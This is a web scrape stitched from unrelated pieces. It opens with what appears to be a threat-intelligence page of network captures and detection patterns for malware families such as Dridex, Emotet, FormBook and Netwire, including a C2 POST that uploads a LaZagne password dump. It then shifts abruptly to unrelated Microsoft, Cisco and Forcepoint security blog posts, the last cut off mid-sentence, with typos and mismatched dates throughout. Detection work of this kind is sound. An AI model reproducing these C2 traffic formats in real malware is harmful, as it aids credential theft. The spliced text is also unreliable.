x-amz-id-2: a21yZ2xrNDNtdGRsa212bGV3YW85amZuZW9ydG5rZmRuZ2tmZGl4aHRvNDVpbgo=
X-Frame-Options: SAMEORIGIN
Content-Encoding: gzip
Content-Length: 0

Following a safebrowsing profile (from external sources)

GET /safebrowsing/ref/eNKSXUTdWXGYAMHYg2df0Ev1wVrA7yp0T-WrSHSB53oha HTTP/1.1
Accept-Language: en-US
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip
Cookie: PREF=ID=foemmgjicmcnhjlacgackacadbclcmnfoeaeeignjhiphdgidlmahkgbchcahclpfcadjnegckejpiofbmllpnaeancgbikcdjohkekapgnkgiijobnknkgiahmkcjipnncehcamnopcmlngcboppjdplhhobhgekdcblgpkdggeklenpcabdkhhhaedogkacljhdgdphfanfbmcbnkgjmplhdkomllhnnoppchchejooiplahpgpmfaegdcpbnd
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
Connection: Keep-Alive
Cache-Control: no-cache

HTTP/1.1 200 OK
Content-Encoding: gzip
Age: 1609
Alternate-Protocol: 80:quic
Cache-Control: public,max-age=172800
Content-Type: application/
Date: Fri, 22 Nov 2019 13:34:50 GMT
Server: ECAcc (frb/67BC)
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Content-Length: 82480


Proofpoints describes DanaBot as the latest example of malware focused on persistence and stealing useful information that can later be monetized rather than demanding an immediate ransom from victims. The social engineering in the low-volume DanaBot campaigns we have observed so far has been well-crafted, again pointing to a renewed focus on “quality over quantity” in email-based threats. DanaBot’s modular nature enables it to download additional components, increasing the flexibility and robust stealing and remote monitoring capabilities of this banker.

It looks like TLS traffic, but it really isen’t. The matching flag is on “24 01 00 00” pattern and following 24 byte first packet. (external take)

00000000  24 01 00 00 00 00 00 00 e5 7c 00 00 00 00 00 00    $....... .|......
00000010  09 7e 00 00 00 00 00 00                            .~...... 


DarkComet is one of the most famous RATs, developed by Jean-Pierre Lesueur in 2008. After being used in the Syrian civil war in 2011, Lesuer decided to stop developing the trojan. Indeed, DarkComet is able to enable control over a compromised system through use of a simple graphic user interface. Experts think that this user friendliness is the key of its mass success.


Dridex loader

OxCERT blog describes Dridex as “an evasive, information-stealing malware variant; its goal is to acquire as many credentials as possible and return them via an encrypted tunnel to a Command-and-Control (C&C) server. These C&C servers are numerous and scattered all over the Internet, if the malware cannot reach one server it will try another. For this reason, network-based measures such as blocking the C&C IPs is effective only in the short-term.”
According to MalwareBytes, “Dridex uses an older tactic of infection by attaching a Word document that utilizes macros to install malware. However, once new versions of Microsoft Office came out and users generally updated, such a threat subsided because it was no longer simple to infect a user with this method.”
IBM X-Force discovered “a new version of the Dridex banking Trojan that takes advantage of a code injection technique called AtomBombing to infect systems. AtomBombing is a technique for injecting malicious code into the ‘atom tables’ that almost all versions of Windows uses to store certain application data. It is a variation of typical code injection attacks that take advantage of input validation errors to insert and to execute malicious code in a legitimate process or application. Dridex v4 is the first malware that uses the AtomBombing process to try and infect systems.”

GET /function.php?3b3988df-c05b-4fca-93cc-8f82af0e3d2b HTTP/1.1
Connection: Keep-Alive

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 05 Nov 2019 20:32:12 GMT
Content-Type: application/octet-stream
Content-Length: 455830
Connection: keep-alive
Keep-Alive: timeout=60
Accept-Ranges: bytes
Content-Disposition: attachment; filename=5dc1dc4cd884c.pdf

Content-Length: 3442
Connection: Close
Cache-Control: no-cache

v..jq..........G.0vR...@ ..6tw..<.{It.y


While Emotet historically was a banking malware organized in a botnet, nowadays Emotet is mostly seen as infrastructure as a service for content delivery. For example, since mid 2018 it is used by Trickbot for installs, which may also lead to ransomware attacks using Ryuk, a combination observed several times against high-profile targets.
It is always stealing information from victims but what the criminal gang behind it did, was to open up another business channel by selling their infrastructure delivering additional malicious software. From malware analysts it has been classified into epochs depending on command and control, payloads, and delivery solutions which change over time.

The following trace is an external trace not updated to the last versions

POST /mult/tlb/ HTTP/1.1
Content-Type: application/x-www-form-urlencoded
DNT: 1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Content-Length: 468
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: nginx
Date: Mon, 07 Oct 2019 13:38:33 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 148
Connection: keep-alive

.^ta.I..Z .._AJ*..=._...5-...F.L{>...`.c.....~.|.h...@.E...2.Z|U..W..M....b......X.FA....x.....\.j?/C......{pi.b....Cz......>D..yQ........G.q...4?..


FormBook is yet another Stealer malware. Like most stealer malware, it performs many operations to evade AV vendors when deploying itself on a victim’s machine. And of course as we see with UrsnifHancitor, Dridex and other trojans, there are many variants with more than one way to receive the payload.

In the past year the threat actor’s favorite method of distributing FormBook has been via malspam and the use of CVE-2017-8570, using an .RTF file format with malicious code to exploit this vulnerability.

Patter suggestion. Host name is almast always “www” driven 😉

POST /k9m/ HTTP/1.1
Connection: close
Content-Length: 3769
Cache-Control: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate



According to X-Force research, the new banking Trojan emerged in the wild in September 2017, when its first test campaigns were launched. Researchers noted that IcedID has a modular malicious code with modern banking Trojan capabilities comparable to malware such as the Zeus Trojan. At this time, the malware targets banks, payment card providers, mobile services providers, payroll, webmail and e-commerce sites (external take)

GET /photo.png?id=0181B9BACBCF3080870000000000FF40000001 HTTP/1.1
Connection: Keep-Alive

HTTP/1.1 200 OK
Server: openresty
Date: Wed, 16 Oct 2019 15:30:33 GMT
Content-Type: application/octet-stream
Content-Length: 605211
Connection: keep-alive
Last-Modified: Tue, 08 Oct 2019 11:43:19 GMT
ETag: "5d9c7657-93c1b"
Accept-Ranges: bytes

IHDR..............N.T....sRGB.........gAMA......a....	pHYs..........o.d.	;.IDATOLrEV.....Le.D|...Rp.{..D...g`...a@.\8,E


The author described LaZagne as an open source project used to retrieve lots of passwords stored on a local computer. It has been developed for the purpose of finding these passwords for the most commonly-used software. It is written in Python and provided as compiled standalone binaries for Linux, Mac, and Windows.

POST /te.php HTTP/1.1
Content-Type: multipart/form-data; boundary=---------------------------58748130728276
User-Agent: Mozilla/5.0 Gecko/20100115 Firefox/3.6
Content-Length: 1526
Cache-Control: no-cache

Content-Disposition: form-data; name="userfile"; filename="admin-MM-PC-passwords.txt"

########## User: admin ##########

------------------- Firefox passwords -----------------

[+] Password found !!!
Password: testpassword

------------------- Outlook passwords -----------------

[-] Password not found !!!
Account Name:
POP3 User:
POP3 Server:
u'Delivery Store EntryID: \x00\x00\ua138\u10bb\ue505\u1a10\ubba1\x08\u2a2b\uc256\x00\u736d\u7370\u2e74\u6c64l\x00\x00\u494e\u4154\ubff9\u01b8\uaa00\u3700\u6ed9\x00\x00C:\\Users\\admin\\Documents\\Outlook Files\\\x00'
SMTP Secure Connection: 0
SMTP Server:
Mini UID: 224868084
'Delivery Folder EntryID: \x00\x00\x00\x00\x81 \xa1\x9f\x92\x06>N\x9c\xc7t\xd9H\xba>f\x82\x80\x00\x00'
u'clsid: \u457b\u3444\u3537\u3134\u2d31\u3042\u3644\u312d\u4431\u2d32\u4338\u4233\u302d\u3130\u3430\u3242\u3641\u3736\u7d36'
Display Name: test Mail.
POP3 Password: testpassword.
u'Leave on Server: \u3139\u3537\u3730'

------------------- Google chrome passwords -----------------

[+] Password found !!!
Password: testpassword

[+] 3 passwords have been found.
For more information launch it again with the -v option

elapsed time = 2.4423969775


HTTP/1.1 200 OK
Date: Tue, 15 Sept 2019 12:08:01 GMT
Server: Apache/2.4.18 (Ubuntu)
Content-Length: 1
Content-Type: text/html; charset=UTF-8


Netwire is a RAT, its functionality seems focused on password stealing and keylogging, but includes remote control capabilities as well. Keylog files are stored on the infected machine in an obfuscated form. Nice to spot in “41 00 00 00 99” pattern on initial packet.

00000000  41 00 00 00 99 80 3a e0 e8 5f d7 ea 8c af 76 cc   A.....:. ._....v.
00000010  c4 cc ad 5a 10 72 cc d0 5e 64 d8 50 80 fc b6 e6   ...Z.r.. ^d.P....
00000020  54 25 bf e0 ea 7f 7b e4 ff 54 70 e8 eb c0 fa 80   T%....{. .Tp.....
00000030  a0 a0 f3 a0 b0 0a 94 04 84 31 7c 3f e7 8c 90 c5   ........ .1|?....
00000040  ce c4 11 97 d9                                     .....


Ostap is a commodity JScript downloader first seen in campaigns in 2016. It has been observed being delivered in ACE archives and VBA macro-enabled Microsoft Office documents. Recent versions of Ostap query WMI to check for a blacklist of running processes.

Following a network trace externally found

POST /angola/mabutu.php?pi=29h&tan=cezar&z=662343339&n=0&u=20&an=9468863238 HTTP/1.1
Connection: Keep-Alive
Content-Type: text/plain; Charset=UTF-8
Accept: */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Content-Length: 1034

Microsoft Windows 7 Professional 6.1.7601*Locale:0409
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sent64.jse

System Idle Process*null
WINWORD.EXE*C:\Program Files\Microsoft Office\Office14\WINWORD.EXE


RSA describes PlugX as a RAT (Remote Access Trojan) malware family that is around since 2008 and is used as a backdoor to control the victim’s machine fully. Once the device is infected, an attacker can remotely execute several kinds of commands on the affected system.

POST /update?wd=b0b9d49c HTTP/1.1
Accept: */*
x-debug: 0
x-request: 0
x-content: 61456
x-storage: 1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;SV1;
Content-Length: 0
Connection: Keep-Alive
Cache-Control: no-cache


GET /EF003AAB6425775CD949B40C HTTP/1.1
Accept: */*
Cookie: QhTbeUW+YzYYsZWz0PQvBvYIgo8=
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; SLCC2;)
Connection: Keep-Alive
Cache-Control: no-cache

HTTP/1.1 203 
Server: nginx
Date: Tue, 02 October 2019 17:32:40 GMT
Content-Type: text/html;charset=UTF-8
Content-Length: 660
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-Server: ip-172-31-28-245
Set-Cookie: JSESSIONID=4618E9008B004BEE8FE5C81AB063A332; Path=/; HttpOnly


Quasar RAT is a malware family written in .NET which is used by a variety of attackers. The malware is fully functional and open source, and is often packed to make analysis of the source more difficult. Interesting pattern flag on “40 00 00 00”, 68 data bytes on first packet. (external source)

00000000  40 00 00 00 3e 83 58 08 ad d1 05 8d 77 20 53 1f   @...>.X. ....w S.
00000010  dc 2e e8 99 0a f3 f1 bb 3a 8c c2 a1 9d 72 4a 69   ........ :....rJi
00000020  e6 60 97 da 1e 76 87 16 91 f2 1b c4 f4 89 f9 8a   .`...v.. ........
00000030  20 5b 19 e5 7c ae ed f1 b4 5a d2 ce 5f 86 17 20    [..|... .Z.._.. 
00000040  c6 b3 03 8c   


The SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as,,, and others. Typically the actual Download returns an HTTP 404 but still contains data in the Response Body. The following net trace is an external take

Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: application/x-www-form-urlencoded
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 299

..+.........O..`...4..A..wT.F...XM&2.^.Y................E.4	W`.......(.....<,.zK..>c..^...p......n.z"]....\S,[.
......qV4`..Pu*...8W.........M .h.v.S.:.


A financial Trojan believed to be a derivative of Dyre: the bot uses very similar code, web injects, and operational tactics. Has multiple modules including VNC and Socks5 Proxy. Uses SSL for C2 communication.The following trace is an external take.

      << 200 OK 224b
      << 200 OK 12b
      << 200 OK 937b
      << 200 OK


In 2006, Gozi v1.0 (‘Gozi CRM’ aka ‘CRM’) aka Papras was first observed.
It was offered as a CaaS, known as 76Service. This first version of Gozi was developed by Nikita Kurmin, and he borrowed code from Ursnif aka Snifula, a spyware developed by Alexey Ivanov around 2000, and some other kits. Gozi v1.0 thus had a formgrabber module and often is classified as Ursnif aka Snifula. In September 2010, the source code of a particular Gozi CRM dll version was leaked, which led to Vawtrak/Neverquest (in combination with Pony) via Gozi Prinimalka (a slightly modified Gozi v1.0) and Gozi v2.0 (aka ‘Gozi ISFB’ aka ‘ISFB’ aka Pandemyia). This version came with a webinject module.

POST /images/wsF0B4sp/ZaYjjdVgt73Q1BSOy_2Fofi/qF_2BfPTuK/5Ha_2F0xEvmbSfT_2/FluJ8ZF_2Fx8/g6xkZAZrZwN/2skHgzv92i_2BS/uPf4RDQvATKCgx0GZ5gez/ph_2BLcscLQkKDVw/HGZ6zA6DhGCqgPD/VTX09Q_2FUWIFyWps1/nfJ0I3rIZ/QNKbXjeu7xXa3W_2FZSX/bcWtE2zC4RafXFoRlqL/4EC4YHwclzkXrfX/58a3.bmp HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: multipart/form-data; boundary=36775038942641984568
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Content-Length: 399

Content-Disposition: form-data; name="upload_file"; filename="78C6.bin"

\.\..V.]:.o..<]......H..)E.J=x...e%3..U.@.f......].tZ..1....g..OzC.5v.?o.NL...;..)..E.G.a~.....M#;.Cu;N/.3\$....x.....R....e..5.....-mW,..	..C................n.G.|..k0...@...?I.Iu......9k^.U6tzT9.b.3....#..V.4].La....zL.h+...aa..H.D.....Ar.......3.w.<.!.-.....|F9! 3.....7

Privacy breaches: Using Microsoft 365 Advanced Audit and Advanced eDiscovery to minimize impact

GDPR, HIPAA, GLBA, all 50 U.S. States, and many countries have privacy breach reporting requirements. If an organization experiences a breach of customer or employee personal information, they must report it within the required time frame. The size and scope of this reporting effort can be massive. Using Microsoft 365 Advanced Audit and Advanced eDiscovery to better understand the scope of the breach can minimize the burden on customers as well as the financial and reputational cost to the organization.

A changing privacy landscape

In 2005 ChoicePoint, a Georgia-based financial data aggregator had a data breach of 145,000 of its customers. There were multiple security lapses and resulting penalties, but initially, only ChoicePoint’s California-based customers were required to be notified because, at the time, California, with California Senate Bill 1386, was the only state that had a mandatory privacy breach notification law.

Since that time, all 50 U.S. States have put in place mandatory privacy breach notification laws. Countries in the Americas, the Middle East, Europe, and Asia have adopted privacy standards including mandatory breach notification. Broader regulations that address this issue include California Consumer Privacy Act, China’s Personal Information Security Specification, Brazil’s Lei Geral de Proteção de Dados Pessoais (LGPD), and the European General Data Protection Regulation (GDPR). Given how often these laws are added or updated, it’s challenging for any organization to keep up. As one solution, Microsoft 365 Compliance Manager provides a set of continually updated assessments (174 and growing) to assist our customers with these standards.

A board-level business risk

The reputational and financial risk to a company from a privacy breach can be massive. For example, under California Civil Code 1798.80, which deals with the breach of personal health information, there is a penalty of up to $25,000 per patient record breached. For many standards, there are not only regulatory penalties imposed, but also the right of private action by those whose records have been breached (such as, those who have had their records breached can sue for damages, creating financial liability for a company beyond the regulatory penalties).

There are timeframes under which notification must be made. The California Code requires notification to the regulator within 15 days after unauthorized disclosure is detected. Article 33 of GDPR requires notification to the regulator within 72 hours after the organization becomes aware of the breach.

According to a list compiled by the Infosec Institute, the average cost of a data breach in 2019 was $3.9 million but can range as high as $2 billion in cases like the Equifax breach of 2017.

The reputational damage associated with a breach of customer, employee, or other stakeholders’ personal or business information can substantially reduce a company’s value.

The scope of notification (if any is needed at all) and remediation depends on understanding the scope of the breach in a timely fashion. In the absence of reliable information, companies need to make worst-case assumptions that may result in larger notifications, higher costs, and unnecessary hardship for customers and other stakeholders.

Preparation for breach

As security and compliance professionals, our priority is to avoid breaches with a defense in depth strategy including Zero Trust architecture.

Microsoft has comprehensive security solutions for Microsoft 365, as well as compliance and risk management solutions that enable our compliance pillar framework:

But we also must prepare for breaches even as we defend against them. Part of that preparation is putting our organization in a position to scope a breach and limit its impact. This means ensuring we have the data governance and signal in place before the breach happens. Security professionals know that they have to deploy solutions like Data Loss Prevention, firewalls, and encryption to defend against attacks, but they may not focus as much on having the right audit data available and retained, and visualizations and playbooks in place beforehand to scope a future breach.

Use Microsoft 365 Advanced Audit and Advanced eDiscovery to investigate compromised accounts

The Microsoft 365 Advanced Audit solution makes a range of data available that is focused on what will be useful to respond to crucial events and forensic investigations. It retains this data for one year (rather than the standard 90-day retention), with an option to extend the retention to ten years. This keeps the audit logs available to long-running investigations and to respond to regulatory and legal obligations.

These crucial events can help you investigate possible breaches and determine the scope of compromise. Advanced Audit provides the following crucial events:

There are built-in default alert policies that use the Advanced Audit data to provide situational awareness either through Microsoft 365’s own security and compliance portal, through Microsoft’s Azure Sentinel cloud-native SIEM, or through a customer’s third-party SIEM. A customer can create customized alerts to use the audit data as well.

Let’s look at how a customer might use Advanced Audit to investigate a compromised account and scope the extent of a data breach:

In an account takeover, an attacker uses a compromised user account to gain access and operate as a user. The attacker may or may not have intended to access the user’s email. If they intend to access the user’s email, they may or may not have had the chance to do so. This is especially true if the defense in-depth and situational awareness discussed above is in place. The attack may have been detected, password changed, account locked, and more.

If the user’s email has confidential information of customers or other stakeholders, we need to know if this email was accessed. We need to separate legitimate access by the mailbox owner during the account takeover from access by the attacker.

With Advanced Audit, we have this ability. Without it, a customer will have to assume all information in the user’s mailbox is now in the hands of the attacker and proceed with reporting and remediation on this basis.

The MailItemsAccessed audit data item will indicate if a mailbox item has been accessed by a mail protocol. It covers mail accessed by both sync and bind. In the case of sync access, the mail was accessed by a desktop version of the Outlook client for Windows or Mac. In bind access, the InternetMessageId of the individual message will be recorded in the audit record.

We have the ability to forensically analyze mail access via a desktop client or via Outlook Web Access.

We also need to differentiate between the mailbox owner’s legitimate access to a mail item during the attack time period and access by the attacker. We can do this by examining the audit records to see the context of the access, including the session ID and IP address used for access. We match these with other audit records and known good access by the user.

Advanced Audit retains other events like Teams Joins, File Accessed, Messages Sent, Searches Queries, and many others that can support a breach analysis.

When we’ve properly scoped the data that the attacker has had access to, we want to deep dive and inspect the content.

With Advanced eDiscovery we can collect all emails, documents, Microsoft Teams, and Yammer interactions of the account that was taken over. We can search for confidential information and metadata to identify the material in question:

There is metadata for each item which, for emails, includes InternetMessageID as well as many other items such as from, to, and when it was sent, and any Microsoft Information Protection sensitivity label.

Advanced Audit and Advanced eDiscovery are an important part of an effective security risk and compliance strategy. These Microsoft 365 native tools allow our customers to understand the true scope of a breach. It has the potential to substantially reduce or eliminate the reporting requirements stemming from a compromised account. Advanced Audit can reduce the financial and reputational damage to a company, its customers, employees, partners, and other stakeholders.

To learn more about Microsoft Security solutions visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

This document is provided “as-is.” Information and views expressed in this document, including URL and other Internet Web site references, may change without notice. You bear the risk of using it. This document is not intended to communicate legal advice or a legal or regulatory compliance opinion. Each customer’s situation is unique, and legal and regulatory compliance should be assessed in consultation with their legal counsel.

The post Privacy breaches: Using Microsoft 365 Advanced Audit and Advanced eDiscovery to minimize impact appeared first on Microsoft Security.

The dynamic duo: How to build a red and blue team to strengthen your cybersecurity, Part 1

The security community is continuously changing, growing, and learning from each other to better position the world against cyber threats. In the first post of our new Voice of the Community blog series, Microsoft Product Marketing Manager Natalia Godyla talks with Jake Williams, Founder of Rendition Infosec. In part one of this blog Jake shares his insights on the 2020 threat landscape—who to watch for and why—and how to think about red and blue teaming within your organization.

Looking back at the threat landscape of 2020, what stands out?  

The biggest thing that stands out has to be the continued ransomware advances. With IANS, I actually coined the term ransomware 2.0 in early 2019. We were trying to differentiate between the drive-by ransomware attacks and what I call the more APT-style ransomware attacks, where they’re doing lateral movement and actively targeting backups before encryption. Disaster recovery (DR) plans work for the former but really not the latter because the latter cases are actively targeting disaster recovery infrastructure. What I saw this year was just a lot of advancement in attacks.

The second thing is that the number of different groups that are using that commodity malware has definitely gone up. They’re using that commodity malware to get back into orbit for initial access into a network. We’re seeing a lot more of that, like TrickBot. Cybersecurity professionals I’m talking to say, “the TrickBot takedown” but it was an interruption, not a takedown, unlike other malware and botnets in the past that have been wiped out. DNSChanger is a good example. DNSChanger was cut off at the knees but not TrickBot. This is a flesh wound.

We’re seeing a lot more of this commodity malware being used as an entryway. This is the stuff that a lot of folks, myself included, have been talking about for years. This is always a risk. You can’t just say, “Don’t worry, Microsoft Defender Antivirus caught and quarantined it so we’re good now.” From maybe mid-September on, it’s been even more viral than the rest of the year put together. It’s really accelerating, too.

What critical threat groups should security teams be actively monitoring? 

The week before last, I was in a dark web forum and an account that I and a number of other folks in the intel community assess with moderate confidence to be associated with Ryuk was advertising for help with their ransomware operations. They’re looking for experienced ransomware operators, and they have a whole set of criteria, including that they want to see a history that you’re getting an average $400,000 payout. They haven’t asked for help in the past. They have more work than they can handle. That gives you an idea of scope, and I think it comes from the commodity malware. Before now, I haven’t seen large, established ransomware groups advertising for help with their operations. If they thought those accesses were going to last forever, they wouldn’t worry about recruiting others right now.

There’s definitely a place for dark web monitoring but most organizations don’t have the maturity level where they’re getting a good return on that investment. Because even if I tell you that cybercrime groups are recruiting, how do I take that and turn that into something actionable that will help with detection and prevention? I don’t know how much any guidance I provide will help if you’re not patching domain controllers.

From a cybercrime standpoint, we’re seeing a lot more lateral movement being critical to cybercriminals’ attacks. We’re not seeing as many point attacks where they land a phishing email and bam, they’ve extracted a bunch of data and gone. It sounds almost like a cop-out but focus on lateral movement because it kills two birds with one stone. Nation-state groups have to do a lateral movement. So do cybercrime groups to get maximum payouts. Once they’ve had a bite of that big apple, how do they ever go back? I think you’re seeing more groups spending in some cases up to six weeks in a network before they’re doing data extraction and playing a little bit of a longer game versus that immediate gratification.

Cybersecurity mixes both defensive and offensive practices to combat cybercrime. How should organizations think about red and blue teaming in their organization? Do organizations need both, and why?  

A huge majority of people who get into cybersecurity these days want to be red team. I get it. It’s sexy. Bottom line, if you’re thinking of red team as those folks who are actually attempting to penetrate your internal network, I think the number is 1 to 20, 1 to 25, or something like that compared to blue team. You need a lot less red team focus. I’m not saying that organizations where red team is similarly sized to blue don’t provide value. They definitely do, but it’s a question of could you take those same resources and plug them elsewhere and get more value? I think generally, I need a lot more defense than I need offense.

In way too many organizations that have much more balanced red and blue teams, I see a lot of red teams identifying problems that the blue team simply can’t fix from a resourcing standpoint. I also am working with organizations that have very large red teams but haven’t yet moved into hunt teaming. In those situations, I don’t know whether you put hunt under red or blue. I’m ambivalent there but the bottom line is I do need the red team, but I need them for a lot less than a lot of people use them for. I say that as an ex-government hacker; and I still do red team occasionally, but it’s just not where most organizations are going to get the most significant return on investment. I’m not trying to say red team isn’t important but generally, we need to structure significantly more blue team people than red team, and that’s just an unpopular thing for a lot of people to hear.

If you don’t have a solid blue team and have holes today in your defenses, you shouldn’t have a red team. When people say, “We need our own internal red team,” my question is, “Have you had an external red team come in and do a red team evaluation? And if you have, have you actioned those findings?” Not one of them but all of them. If the answer is no, we need to step back and figure out what we need to do. Let’s make sure that you’ve got a blue team that is functioning today and ready to roll forward with the recommendations from the red team. Separate from pragmatism, there’s also a legality issue. Knowing about something and not doing anything about it puts you in a more legally compromising position than not knowing about it at all.

That’s what we find a lot of folks with internal red teams end up with. They’ve got this red team that is basically pushing identified risks into a funnel. How much are we stuffing that funnel? How much do we need defense versus offense?

How does an organization know when to hire an internal red team? What’s the breaking point?

A lot of that depends on the reaction. How quickly are you actioning those findings? If you’re in a spot where you fix all the findings from the annual red team in two months, that’s when I would say, “Yes, without a shadow of a doubt, let’s go hire a red team.” Because that’s going to give me more of that constant churn of findings. On the other hand, if it takes you nine months to get through those findings, you’re going to have another external red team likely in a month anyway. Where’s our value there? If it takes you somewhere in the middle, a lot of it is going to depend on how much risk do we accept.

When we’re documenting where we have gaps and where we don’t, it comes down to where can I get the best return on my investment for our organization? If I still have a lot of blue team gaps, investing in red team would be throwing more gaps at blue team, which causes huge morale issues.

Keep an eye for the second part of the interview as Jake Williams shares best practices on how to structure and evolve red and blue teaming within your organization.

To learn more about Microsoft Security solutions visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity or on LinkedIn for the latest news and updates on cybersecurity.

The post The dynamic duo: How to build a red and blue team to strengthen your cybersecurity, Part 1 appeared first on Microsoft Security.

Introducing: Cisco’s Innovated Transparency Report

As our customers’ businesses evolve in complexity and scale, we are hyperaware of our responsibility as a data steward to protect the privacy and trusted relationships that drive our business forward.

For many years, Cisco has published* the number of demands for customer data that we receive from law enforcement and governments around the world. In an age of growing geopolitical tensions, evolving threat landscapes, and increasing demands for corporate transparency, tech companies must stay focused on the steps they are taking to ensure customer privacy is recognized as a human right and a business imperative. A human focus is at the heart of every aspect of Cisco innovation, and we continuously work to make this apparent to our customers.

We listen to our customers’ security and privacy concerns as a guide to help shape our company and practices, all with a goal of being a trusted partner at every step. In response, we have refreshed our Transparency Report to answer our customers’ top questions about government data demands. Our leading additions are outlined below.

Global Map

The interactive map display gives geographic granularity into the very limited number of demands we receive from around the world. It illustrates the total disclosures of customer data by country and notes why some demands did not result in disclosure. One of the key metrics included in each country breakdown is the number of demands Cisco rejects during the given timeframe. We firmly hold law enforcement and governments accountable to our commitments to protect customer data, and this often includes rejecting requests that don’t meet our standards. Additionally, often Cisco does not have the data law enforcement is looking for, as illustrated by the no data disclosed metric.

Law Enforcement Guidelines

For the first time, we are publishing law enforcement guidelines to inform our customers and law enforcement agencies about the ways we protect customer data. It outlines the legal burden required of law enforcement agencies and governments when demanding customer data, and the laws to which these demands are subject. Cisco recognizes and appreciates government efforts to thwart bad actors and deter criminal activity. Nonetheless, we remain committed to ensuring that access to our solutions and services are protected from unlawful intrusion.

Frequently Asked Questions

At Cisco, we are constantly working on clear and simple communication to our customers, especially when it comes to important topics, like the ways in which we are protecting your data. We’ve added a Frequently Asked Questions (FAQ) section to guide customers through this crucial discussion. In this section, we reiterate that Cisco never allows backdoors or gives governments or law enforcement agencies direct access to content or non-content data without following appropriate legal process.

Our commitment to customers is to be open and transparent, particularly as it relates to issues that could potentially impact their business. As such, Our Principled Approach continues to guide every decision we make regarding government demands for customer data. It details the commitments we have made to protect customer privacy, minimize disclosure, and ensure we uphold and respect human rights.

To learn more about Cisco’s commitment to Transparency and Accountability, please visit our Trust Center or view our Global Data Demand Infographic. Questions about our Transparency Report or Our Principled Approach? Email:

*Transparency report data is published twice yearly, covering a reporting period of either January-to-June or July-to-December. Cisco publishes this data six months after the end of a given reporting period, in compliance with legal restrictions on the timing of such reports.

Forcepoint and Microsoft: Risk-based access control for the remote workforce

This blog post is part of the Microsoft Intelligence Security Association (MISA) guest blog series. Learn more about MISA here.

Adopting cloud-based services as part of an organization’s digital transformation strategy is no longer optional, it’s a necessity. Last year, only 18 percent of the workforce worked remotely full-time. Today, companies have been forced to accelerate their digital transformation efforts to ensure the safety and well-being of employees. At the same time, organizations cannot afford to sacrifice productivity for the sake of security. With the massive move to online experiences and remote working, comes a new set of challenges—how do you ensure your data, your network, and your employees stay secure, wherever they are?

Forcepoint has integrated with Azure Active Directory (Azure AD) to enhance existing Conditional Access capabilities by orchestrating change in authentication policies dynamically so that every user authenticates with steps aligned to their risk score. Active sessions can be terminated upon risk score increase so that users must re-authenticate using an enhanced sequence of challenges, and users can be temporarily blocked in the case of high risk. Forcepoint risk scores, combined with Azure AD risk, are calculated based on the user’s context, such as location or IP, to help automatically and accurately prioritize the riskiest users. The joint solution enables administrators to protect critical data and leverage the power of automation to prevent data compromise and exfiltration from occurring. By combining the power of Azure AD with Forcepoint security solutions, organizations can scale a risk-adaptive approach to identity and access management and cloud application access without changing their existing infrastructure.

People are the perimeter

Before COVID-19, in our 2020 Forcepoint Cybersecurity Predictions and Trends report, we detailed the shifting emphasis to a “cloud-first” posture by public and private sector organizations alike. There was, and still is, a clear need for organizations to expand their view of network security and begin to understand that their people are the new perimeter. Today, more than ever, it is imperative for businesses to comprehend and to manage the interaction between their two most valuable assets—their people and their data.

Human-centric cybersecurity is about focusing on not just individuals, but how their behaviors evolve over time. Forcepoint risk scores are designed to continuously calculate the level of risk associated with individual behavior in the past, present, and future. Most organizations today will adopt blanket policies to improve their security posture. Even though policies for individuals may have some level of flexibility, most tend to apply policies to all users within a group—regardless of the individual risk profile. This results in unnecessarily complicated steps for low-risk users accessing common applications, and weak authentication challenges for privileged users logging into critical systems. In short, these implementations are likely frustrating your low-risk users by creating barriers to productivity and allowing high-risk users to fly under the radar.

Forcepoint’s mission is to provide enterprises with the tools needed to understand and quickly assess the risk levels of human behavior across their networks and endpoints and take automated action by implementing risk adaptive protection. We offer a portfolio of security solutions designed to quickly and continuously assess the potential of compromised user risk and automatically apply the appropriate protective measures.

Forcepoint + Azure Active Directory = Better together

Forcepoint has partnered with the Azure Active Directory team on a series of integrations designed to provide remote workers secure access to their cloud and legacy on-premise applications. Together, our integrated solutions combine the risk score calculated by Forcepoint’s Cloud Access Security Broker (CASB)—with Azure AD—to apply the appropriate conditional access policies tailored to each individual user risk.

integrated solutions combine the risk score calculated by Forcepoint’s CASB - with Azure AD- to apply the appropriate conditional access policies tailored to each individual user risk.

